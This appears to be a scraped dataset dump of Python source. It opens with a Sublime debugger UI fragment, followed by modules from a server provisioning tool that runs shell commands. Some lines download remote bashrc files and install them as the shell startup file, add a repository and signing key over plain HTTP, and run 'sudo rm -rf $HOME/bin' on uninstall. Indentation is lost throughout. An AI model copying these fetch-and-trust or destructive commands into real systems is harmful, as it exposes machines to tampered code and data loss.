def render(self) -> ui.div.Children:
return [
ui.div(width=1000, height=0.15, css=css.selected),
]
class SelectedLineText(ui.div):
def __init__(self, text: str) -> None:
super().__init__()
self.text = text
def render(self) -> ui.div.Children:
return [
ui.div(width=25, height=2.5)[
ui.text(self.text, css=css.selected_text),
],
]
class SelectedLine:
def __init__(self, view: sublime.View, line: int, text: str):
# note sublime lines are 0 based not 1 based
pt_current_line = view.text_point(line - 1, 0)
pt_prev_line = view.text_point(line - 2, 0)
pt_next_line = view.text_point(line, 0)
line_prev = view.line(pt_current_line)
line_current = view.line(pt_prev_line)
self.top_line = ui.Phantom(UnderlineComponent(), view, line_current, sublime.LAYOUT_BELOW)
self.text = ui.Phantom(SelectedLineText(text), view, sublime.Region(pt_next_line - 1, pt_next_line - 1), sublime.LAYOUT_INLINE)
self.bottom_line = ui.Phantom(UnderlineComponent(), view, line_prev, sublime.LAYOUT_BELOW)
def dispose(self):
self.top_line.dispose()
self.text.dispose()
self.bottom_line.dispose()
```
#### File: debugger/views/sources.py
```python
from ...typecheck import *
from ...import dap
from ...import core
from ...import ui
from ..debugger_session import Sources
from . import css
class SourcesView(ui.div):
def __init__(self, sources: Sources, on_click: Callable[[dap.Source], None]):
super().__init__()
self.sources = sources
self.on_click = on_click
def added(self, layout: ui.Layout):
self.on_updated_handle = self.sources.on_updated.add(self.dirty)
def removed(self):
self.on_updated_handle.dispose()
def render(self) -> ui.div.Children:
items = []
for source in self.sources.sources:
items.append(SourceView(source, self.on_click))
return [
ui.div()[items]
]
class SourceView(ui.div):
def __init__(self, source: dap.Source, on_click: Callable[[dap.Source], None]):
super().__init__()
self.source = source
self.on_click = on_click
def render(self) -> ui.div.Children:
items = [
ui.div(height=3)[
ui.click(lambda: self.on_click(self.source))[
ui.text(self.source.path or self.source.name or "<no source name>", css=css.label_secondary)
]
]
]
for sub_source in self.source.sources:
items.append(SourceView(sub_source, self.on_click))
return items
```
#### File: modules/ui/__init__.py
```python
from .. import core
from .render import *
from .events import (
GutterEvent,
HoverEvent,
ViewEventsListener,
view_loaded,
view_activated,
view_text_hovered,
view_gutter_hovered,
view_gutter_clicked,
view_selection_modified,
view_modified,
view_drag_select)
from .html import div, span, text, icon, click, code
from .css import css
from .layout import *
from .image import *
from .input import *
from .align import text_align
import os
from ..libs import asyncio
_update_timer = None #type: Optional[Timer]
def startup() -> None:
Images.shared = Images()
global _update_timer
_update_timer = Timer(update, 2, True)
def shutdown() -> None:
if _update_timer:
_update_timer.dispose()
perform_render()
``` |
{
"source": "8cylinder/boss",
"score": 2
} |
#### File: boss/src/bash.py
```python
import os
import sys
from dist import Dist
import datetime
import subprocess
import shlex
# noinspection PyUnresolvedReferences
from errors import *
from util import display_cmd
# noinspection PyUnresolvedReferences
import util
class Bash:
APTUPDATED = False
info_messages = []
WWW_USER = 'www-data'
def __init__(self, dry_run=False, args=None):
self.ok_code = 0
self.requires = []
self.apt_pkgs = []
self.provides = []
self.distro = Dist()
self.dry_run = dry_run
self.args = args
self.scriptname = os.path.basename(__file__)
if args and not dry_run:
# action = args.subparser_name
self.log(self.__class__.__name__)
self.now = datetime.datetime.now().strftime('%y-%m-%d-%X')
@staticmethod
def log(name):
log_name = '~/boss-installed-modules'
mod = '{}\n'.format(name)
try:
with open(os.path.expanduser(log_name), 'r') as f:
installed_mods = f.readlines()
except FileNotFoundError:
installed_mods = []
installed_mods = set(installed_mods)
installed_mods.add(mod)
with open(os.path.expanduser(log_name), 'w') as f:
f.writelines(installed_mods)
def sed(self, sed_exp, config_file):
new_ext = '.original-{}'.format(self.now)
sed_cmd = 'sudo sed --in-place="{}" "{}" "{}"'.format(new_ext, sed_exp, config_file)
self.run(sed_cmd)
def append_to_file(self, filename, text, user=None, backup=True, append=True):
if backup:
new_ext = '.original-{}'.format(self.now)
copy_cmd = 'sudo cp "{file}" "{file}{now}"'.format(
file=filename, now=new_ext)
self.run(copy_cmd)
www_user = ''
if user == self.WWW_USER:
www_user = '-u {}'.format(self.WWW_USER)
append_flag = ''
if append is True:
append_flag = '-a'
add_cmd = 'echo | sudo {user} tee {append} "{file}" <<EOF\n{text}\nEOF'.format(
text=text, file=filename, user=www_user, append=append_flag)
self.run(add_cmd, wrap=False)
def apt(self, progs):
self._apt(progs)
def install(self):
self._apt(self.apt_pkgs)
return True
def pre_install(self):
return True
def post_install(self):
return True
def run(self, cmd, wrap=True, capture=False, comment=False):
if wrap:
pretty_cmd = ' '.join(cmd.split())
display_cmd(pretty_cmd, wrap=True, script=self.args.generate_script, comment=comment)
else:
display_cmd(cmd, wrap=False, script=self.args.generate_script,
comment=comment)
if self.args.dry_run or self.args.generate_script:
return
if capture:
# result = subprocess.run(cmd, shell=True, check=True, executable='/bin/bash', stdout=subprocess.PIPE)
result = subprocess.check_output(cmd, shell=True, executable='/bin/bash')
sys.stdout.flush()
else:
# result = subprocess.run(cmd, shell=True, check=True, executable='/bin/bash')
result = subprocess.check_call(cmd, shell=True, executable='/bin/bash')
return result
def curl(self, url, output, capture=False):
cmd = 'curl -sSL {url} --output {output}'.format(
url=url, output=output)
result = self.run(cmd, capture=capture)
return result
def restart_apache(self):
"""Restart Apache using the apropriate command
Details about wether to use service or systemctl
https://askubuntu.com/a/903405"""
if self.distro == Dist.UBUNTU:
self.run('sudo service apache2 restart')
else:
util.error('restart_apache has unknown platform')
def _apt(self, packages):
dry = '--dry-run' if self.dry_run else ''
packages = ' '.join(packages)
if not packages:
return False
if not Bash.APTUPDATED:
self.run('sudo apt-get --quiet update')
# self.run('sudo apt-get --quiet --yes upgrade') # not really necessary
Bash.APTUPDATED = True
self.run('export DEBIAN_FRONTEND=noninteractive; sudo apt-get {dry} --yes --quiet install {packages}'.format(
dry=dry, packages=packages))
return True
def info(self, title, msg):
self.info_messages.append([title, msg])
```
#### File: src/mods/aptproxy.py
```python
from bash import Bash
from dist import Dist
from errors import *
class AptProxy(Bash):
"""Use the host machine's apt proxy
apt-cacher-ng needs to be installed and configured on the host:
1. sudo apt install apt-cacher-ng
2. echo 'Acquire::http::Proxy "http://<HOST IP>:3142";' | sudo tee /etc/apt/apt.conf.d/00aptproxy
Installation can be checked by going to http://<HOST IP>:3142/acng-report.html
Then when using the `aptproxy` module, it will create a config
file in apt.conf.d to configure apt to use the host's apt cache by
running the following command:
`echo 'Acquire::http::Proxy "http://<HOST IP>:3142";' | sudo tee /etc/apt/apt.conf.d/00aptproxy`"""
conf_file = '/etc/apt/apt.conf.d/00aptproxy'
provides = ['aptproxy']
requires = []
title = 'Apt Proxy'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def post_install(self):
host_ip = self.args.host_ip
proxy_setting = '\'Acquire::http::Proxy "http://{}:3142";\''.format(host_ip)
cmd = 'echo {setting} | sudo tee {ip}'.format(
setting=proxy_setting,
ip=self.conf_file
)
self.run(cmd)
```
#### File: src/mods/bashrc.py
```python
import os
from bash import Bash
from dist import Dist
from errors import *
class Bashrc(Bash):
"""A custom bashrc from GitHub and symlink boss to ~/bin/
1. Downloads a bashrc from GitHub and creates a bin dir in the $HOME dir.
2. Backups the orginal .bashrc
3. Symlinks the ~/bin/bashrc to ~/.bashrc
4. Symlink /project/boss to ~/bin/boss"""
provides = ['bashrc']
requires = []
title = 'Custom .bashrc'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.apt_pkgs = ['emacs-nox']
def install_bashrc(self):
self.run('if [[ ! -d $HOME/bin ]]; then mkdir $HOME/bin; fi')
gh_files = {
'bashrc': 'https://raw.githubusercontent.com/8cylinder/bin/master/bashrc',
'bashrc_prompt.py': 'https://raw.githubusercontent.com/8cylinder/bin/master/bashrc_prompt.py',
'bashrc_prompt.themes': 'https://raw.githubusercontent.com/8cylinder/bin/master/bashrc_prompt.themes',
}
for ghname, ghurl in gh_files.items():
self.curl(ghurl, '$HOME/bin/' + ghname)
# if .bashrc is not a link, back it up
self.run('if [[ ! -L $HOME/.bashrc ]]; then mv $HOME/.bashrc $HOME/.bashrc.original; fi')
# if .bashrc does not exist, make a link to bin/bashrc
self.run('if [[ ! -e $HOME/.bashrc ]]; then ln -s $HOME/bin/bashrc $HOME/.bashrc; fi')
# self.run('echo -e "\n\nalias emacs=\'jmacs\'\n" >> $HOME/bin/bashrc')
self.run('chmod +x $HOME/bin/bashrc_prompt.py')
def link_boss(self):
source = __file__
name = os.path.basename(source)
dest = os.path.expanduser(os.path.join('$HOME/bin', name))
self.run('if [[ ! -h {} ]]; then ln -s {} {}; fi'.format(dest, source, dest))
def post_install(self):
self.install_bashrc()
self.link_boss()
def uninstall(self):
self.run('if [[ -d $HOME/bin ]]; then sudo rm -rf $HOME/bin; fi')
# if .bashrc.original exists, restore it
self.run('if [[ -e $HOME/.bashrc.original ]]; then mv .bashrc.original .bashrc; fi')
```
#### File: src/mods/example.py
```python
from bash import Bash
from dist import Dist
from errors import *
class Example(Bash):
"""Short doc string here for the list command
The full doc string is used for the help command. This should list
the command line args this module needs.
Required class variables:
provides
requires
title
"""
# sel.provides is used for dependency management, each module can
# provide more than one. See lamp.py for an example.
provides = ['example']
# Any mods that this mod needs as a prerequisite. These names are
# matched to provides.
requires = ['example2', 'example3']
# A human readable name that is used in help and listing.
title = 'Pretty name'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# List of apt packages to be installed via apt.
self.apt_pkgs = ['package1', 'package2']
# dist can be used to different things based on what version of
# linux being used.
if self.distro == (Dist.UBUNTU, Dist.V18_04):
self.apt_pkgs = ['package1', 'package2', '18.04_package_only']
# bash provides several methods
self.sed('sed expression', 'file')
self.apt(['list', 'of', 'packages'])
self.curl('url', 'output-filename', capture=True)
self.info('title', 'message')
self.restart_apache()
self.run('any valid bash command string', wrap=True, capture=False)
# capture the result of the command
result = self.run('any valid bash command string', wrap=True, capture=True)
# Run before apt installs the apt_pkgs.
def pre_install(self):
pass
# Run after apt installs the apt_pkgs.
def post_install(self):
pass
```
#### File: src/mods/first.py
```python
from bash import Bash
from dist import Dist
from errors import *
class First(Bash):
"""Misc apps that are useful
The timezone is set to America/Los_Angeles and Emacs is configured
as the defalt editor.
"""
provides = ['first']
requires = []
title = 'First'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.distro > (Dist.UBUNTU, Dist.V14_04):
self.apt_pkgs = [
'tree', 'elinks', 'virt-what', 'silversearcher-ag', 'unzip',
'zip', 'htop', 'source-highlight', 'whois', 'curl', 'figlet', 'ntp', 'locate'
]
# self.apt_pkgs += ['joe']
self.apt_pkgs += ['emacs-nox'] # adds aprox 100mb
elif self.distro == (Dist.UBUNTU, Dist.V14_04):
self.apt_pkgs = [
'tree', 'elinks', 'virt-what', 'silversearcher-ag', 'unzip',
'htop', 'source-highlight', 'whois', 'curl', 'figlet'
]
# self.apt_pkgs += ['joe']
self.apt_pkgs += ['emacs24-nox'] # adds aprox 100mb
def pre_install(self):
pass
def post_install(self):
# set timezone
tz = 'America/Los_Angeles'
self.run('sudo timedatectl set-timezone {}'.format(tz))
self.bash_settings()
def bash_settings(self):
bashrc = "$HOME/.bashrc"
editor = 'emacs'
settings = '''
export HISTSIZE=-1
export HISTFILESIZE=-1
export HISTTIMEFORMAT="%F %T "
shopt -s histappend
export EDITOR='{editor}'
export VISUAL='{editor}'
export SUDO_EDITOR='{editor}'
'''.format(editor=editor)
settings = '\n'.join([i[10:] for i in settings.split('\n')])
self.append_to_file(bashrc, settings, backup=True)
```
#### File: src/mods/webmin.py
```python
from bash import Bash
from dist import Dist
from errors import *
class Webmin(Bash):
provides = ['webmin']
requires = ['apache2', 'php', 'cert']
title = 'Webmin console'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.apt_pkgs = ['webmin']
def pre_install(self):
# add webmin to sources.list, get PGP key
cmds = [
'sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak',
'echo "deb http://download.webmin.com/download/repository sarge contrib" | sudo tee -a /etc/apt/sources.list',
# 'wget http://www.webmin.com/jcameron-key.asc',
# 'sudo apt-key add jcameron-key.asc',
]
self.curl('http://www.webmin.com/jcameron-key.asc', 'jcameron-key.asc')
self.run('sudo apt-key add jcameron-key.asc')
for cmd in cmds:
global APTUPDATED
APTUPDATED = False
self.run(cmd)
self.info('Webmin', 'http://{}:10000 (user & password for any user that can sudo)'.format(self.args.servername))
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.